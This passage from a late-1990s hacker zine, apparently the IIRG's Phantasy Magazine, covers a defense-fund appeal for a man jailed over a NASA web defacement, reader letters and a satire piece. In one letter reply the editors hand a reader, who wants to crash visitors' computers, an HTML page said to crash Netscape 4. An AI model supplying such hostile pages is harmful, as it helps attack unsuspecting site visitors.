incarcerated. Despite the comparatively benign nature of his crimes, he is 
placed in same environment as murderers and rapists. He is only allowed 1 
visit per week at 15 minutes per visit. His family has tried to bring him 
reading material -- harmless magazines like People -- but the prison has 
disallowed it. 
In a recent incident, Jason went to brush his teeth after finishing his work 
as a cleaner at the prison. He saw another inmate cleaner come out of one of 
the bathrooms. Assuming the bathroom was free, the other he went in and 
brushed his teeth. A guard then came and said the bathroom was for guards 
only. He was written up for it, and given a reprimand for "misconduct". 
Three days were tacked onto his sentence as a result. This incident will 
likely jeopardize his parole -- which he may be up for soon -- but worst of 
all, they threw him in the "hole". Which according to Jason himself, isn't a 
bad enough description of the place. Solitary confinement in this prison 
consists of an unlit 11 x 6 room with no mattress, bed, or window. Other 
prisoners sneak drugs in by "sticking them in their ass and shitting onto 
magazines to get them out." Even the notorious Canadian serial-killer Karla 
Homolka is not forced to live in such a Dickensian environment. 

Update: You can write to Jason Mewhiney in Prison. 

Send any correspondence to:

Jason Mewhiney
Box 90
Monteith Ontario
P0K 1P0
CANADA

B. Sentencing

Jason was sentenced to six months in jail after pleading guilty to twelve of 
the fifty one charges against him. After his prison sentence, it is likely 
that he may serve a time under "house arrest". While under house arrest, 
Jason will effectively be banned from any and all computer use. This leaves 
Jason without his one marketable skill and will create massive problems for 
him when he is released. In addition to the prison-term and the possible 
restrictions upon his release, Jason has also been ordered to pay a $6000 
fine. Six thousand dollars is far short of the original seventy-thousand that
was being sought by NASA, yet it will still remain as a considerable 
financial burden to someone who will be left effectively unemployable after 
his release. 

II. Analysis of the case

The original charges that Jason faced were completely blown out of all 
proportions. NASA claimed that to copy the backup of their index page back 
and reinstall and secure the machine cost them an estimated $70,000. Anyone 
with any experience of computers and computer security can see that this is 
a grossly inflated figure. You can read NASA's statement on the whole 
incident at http://www.hq.nasa.gov/office/oig/hq/press/pr99025.txt
During the course of Jason's trial and conviction, thousands of dollars of 
taxpayer money were wasted on frivolous and unnecessary actions sanctioned by
both the FBI and the RCMP. The RCMP agents and Canadian authorities involved 
in the case were all flown down to NASA headquarters for what essentially 
added up to as a free tour. American authorities and NASA officials were 
flown up to Canada on several occasions simply to attend the occasional short
bail-hearing or pre-trial motion. Everyone was flown up to Canada again for 
the sentencing hearing, despite their presence not being required. Who ends 
up paying for all of this air-travel and accommodation? The Canadian taxpayer,
in the end. Unfortunately, this never came to light during any of the 
reporting on Jason's case. Even though Jason eventually plea bargained and 
managed to avoid the huge fine and long jail term that he was threatened with,
we still have to ask ourselves whether someone should be imprisoned for what 
was essentially no more than a prank. Can we continue to allow corporations 
and government agencies to arbitrarily pick numbers out of the air when 
accounting for "damages" that occurred as a result of a mere web-page 
defacement? 

The Trout Defense Fund 

.a@&$$$ .a@&$&@a.   .a&$$$$ .a&$$$$      .a@&$$$ .a$$$a. .a@&$$$ a$$  $$a
 $$$$$$$ $$$'  `$$$  $$$$$$$ $$$$$$$      $$$$$$$ $$$$$$$ $$$$$$$ $$$  $$$
 $$$     $$$. .a&$'  $$$'    $$$'         $$$     `$$$$$' $$$$.   $$$  $$$
 $$$$$$  $$$$$$$'    $$$$$a  $$$$$a  THE  $$$$$$  .aaaaa. `$$$$a. $$$$$$$$
 $$$     $$$ `$$a.   $$$.    $$$.         $$$     $$$$$$$   `$$$$ $$$  $$$
 $$$     $$$  `$$$a. $$$$$$$ $$$$$$$      $$$     $$$$$$$ $$$$$$$ $$$  $$$
 $$$     $$$   `$$$' `$$$$$$ `$$$$$$      $$$     `$$$$$' "$$$$$" $$$  $$$

Defense Fund 

Jason Mewhiney has been financially ruined by the events surrounding his 
trial and incarceration. Jason's mother is bearing the brunt of the burden, 
facing thousands of dollars in Lawyer fees while Jason sits in prison. In 
addition to the debt incurred by the trial, Jason will have to deal with the
six-thousand dollar fine he has been ordered to pay to NASA. Without any 
means of income, and more than likely no chance of gainful employment, this 
case is likely to haunt him financially for years to come.
A Defense fund has been set up to help ease the burden placed on Jason and 
his family. If you care to donate, please send either a check or money order to:

The Trout Defense Fund
2527 Farmcrest Dr. #404 
Herndon, VA 20171
USA

Any amount is greatly appreciated. We are currently working on setting up a 
dedicated account for the fund so that money can be directly transferred. Any 
moneys received will go directly to help cover Jason's legal bills. If you 
can't afford to donate, then why not take the time to write Jason a letter or
send him some reading material? Anything sent to the defense fund will be 
forwarded to either Jason or his mother directly. 

Thank you for your support.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [10]: Letters to the IIRG
               (Fan Mail, Hate Mail, Letter Bombs)
               <iirg@iirg.org>

 I receive so many letters and requests that it would be impossible to
post all letters received. However, every now and than I get one that
makes me laugh or vomit uncontrollably. I offer these to you.....

------------------------------------------------------------------------------
1.  I have a question about Phantasy Magazine...

From: Pegasi17@aol.com
Delivered-To: iirg@iirg.org
Date: Sat, 10 Jul 1999 03:59:06 EDT
Subject: I have a question about Phantasy Magazine...
To: iirg@iirg.org

Is Phantasy Magazine going to be continued or was the issue 22 the last issue 
that will be made?  Thank you much...

     ---- Pegasi17


IIRG - Well the last issue was #23, and No... We are publishing again.

------------------------------------------------------------------------------- 
2. Inquiry?

Delivered-To: iirg@iirg.org
Date: Sun, 25 Jul 1999 23:16:36 -0700
From: Erik Bos <Genevaroth@yahoo.com>
To: iirg@iirg.org
Subject: inquiry

I am looking for schematics for the following: 


ELF generator microwave weapon

if in any back issues there is anything like this pls. email me with
ordering info.


Thank you

Erik Bos

IIRG - Sorry, but the technology to Microwave Elves has been patented
       and kept strictly confidential by the Keebler Corporation.
       Might I suggest you try a toaster oven instead?


-------------------------------------------------------------------------------
3. Are You for Hire?

From: "Marie Estes" <sophistry7@hotmail.com>
To: iirg@iirg.org
Date: Sun, 24 Oct 1999 21:23:43 GMT

I'm enjoying your prose on your website.
I, however, am not one of your kind.  I admire your exploits and ambition.  
I require your services and do not have the knowledge or expertise, nor 
temporal resources to do the job myself.  Perhaps you might consider an 
innocuous mercenary act?
You ARE for hire, aren't you?
RSVP.

IIRG - What did you have in mind Marie? And does it involve chocolate
      syrup and whip cream?

-------------------------------------------------------------------------------
4. Info?

From: "DK" <ww7@locl.net>
To: <iirg@iirg.org>
Subject: info
Date: Sat, 25 Dec 1999 17:57:34 -0500

Hi
    I am looking for the code that will allow a webpage to reboot the 
viewer computer.  Do you have or know any info that will help me find this 
coding?

syburcat    

IIRG - Try putting this on your page to Crash Netscape 4

=============================
<html>
<head>
<title>Smash Netscape</title>

<body bgcolor="#000000" text="#ffffff">

<br>
<font face="Arial, Helvetica, Geneva">
<center>
<font size="5" color="#777777"><b>Smash Netscape</b></font><br>
<br>
This page will crash Netscape Communicator 4!
</center>
</font>

<div id="smashItDiv" style="position: absolute; left: 160px; top: 175px; 
width: 264px; high: 150px; z-index: 50; visibility: visible;">
<table border="0" cellspacing="0" cellpadding="0" width="264">
<tr>
<td align="center" valign="middle">

<form name="smashItForm">

<img name="NSCrashImg" src="X.gif" border="0">

<br>
<font face="Arial, Helvetica" size="2">Crash Netscape</font><br>
<input name="askjdfh" type="input" size="20" maxlength="100"><br>
</font>

</form>
</td>
</tr>
</table>
</div>
<br>
</body>
</html>
==================================
-----------------------------------------------------------------------------
5. You Evil Hacker Survivalists You!!!

Date: Thu, 02 Mar 2000 22:36:13 -0600
From: Richard Reed <sanders4@knightsnet.com>
To: ticom@iirg.org

Hi yes I think this page is a threat to our country  therefore I have
forwarded a copy of this page and a link to various  government agencies.
http://www.iirg.org/~ticom/survival.html

TICOM - The only thing the Connecticut Survivalist Alliance Page is a 
        threat to are totalitarians, socialists, close-minded idiots, and 
        other such scum who despise the Bill of Rights. Since you are 
        apparently one of those types you have my permission to go frolic 
        in conjunction with yourself.
        My guess is that you are a terrorist, child molester, rapist, or 
        serial killer who does not wish his potential victims armed with 
        knowledge that they may use to defend themselves and maintain their 
        self-reliance and determination. 
        If not, then you are simply an idiot.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [12]: Phantasy Distribution Site

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Phantasy Distribution Sites

 Phantasy's Distribution Site's are continually changing, we apologize if you
 visit a site and it's not there. But always go to our main site and it will
 be there.

 1. The IIRG's Main Phantasy Distro Site

   http://www.iirg.org/phantasy.html

2. L0pht's Phantasy Magazine Archive

   http://www.l0pht.com/%7Eoblivion/IIRG.html

3. EFF "Phantasy" Archive

   http://www.eff.org/pub/Publications/CuD/Phantasy/index.html

If you'd like to set-up a Phantasy Distro site and be listed here and
 on the IIRG's link page, e-mail Mercenary at iirg@iirg.org

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [13] Articles We Never Want to See
              This Month - @MISTAKE PC Busters
   
 Forget about those nasty viruses and malicious hackers; the real threat 
to your PC is far more insidious. Your home computer may be host to a 
demon from Hell. You and your family may well come under its malevolent 
control.

"While the Computer Age has ushered in many advances, it has also opened yet 
another door through which Lucifer and his minions can enter and corrupt 
men's souls," says Reverend Jim Peasboro, author of the upcoming book, 
The Devil in the Machine. 

That why the trained "White Hat Hackers" at the IIRG's 
@MISTAKE Corporation are coming to your aid. The IIRG's world renowned
staff of trained demon killing Mercenaries will rid your PC of the nastiest
spawns of Satan.

Listen to these testimonials:


"My wife who had never expressed an impure thought in her life was entering 
Internet chat rooms and found herself spewing foul, debasing language that
she would never use normally" The IIRG came in with battle axes and completely
destroyed her system. It was the best display of Information Warfare that
I have ever seen."
                            Winn Schwartau


"My programs began talking directly to me, openly mocking me.
It typed out, John, you are a liar and your book sucks.'" 
Then the printer went haywire and started printing out what looked like 
gobbledygook. I later had a college professor examine the text.
He told me it was an ancient language and to contact the IIRG.
It finally turned out to be a stream of obscenities written in a 
2,800-year-old Mesopotamian dialect! Thank god the IIRG knows how 
translate ancient Mesopotamian."

                             John Markoff

The Reverend advises anyone suspecting that their computer is possessed to 
consult a clergyman, or, if that fails - contact the IIRG and the @MISTAKE
Corporation.

Their skilled Technicians can replace your hard drive and reinstall your
software, getting rid of the wicked spirit permanently and installing
numerous monitoring and backdoor programs on your system.
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                     PHANTASY(C) IIRG 1991 - 2000
                        May Odin Guide Your Way!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
       May You Be Feasting and Drinking in Valhalla For a Full Night
              Before the Christian God Knows You're Dead
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-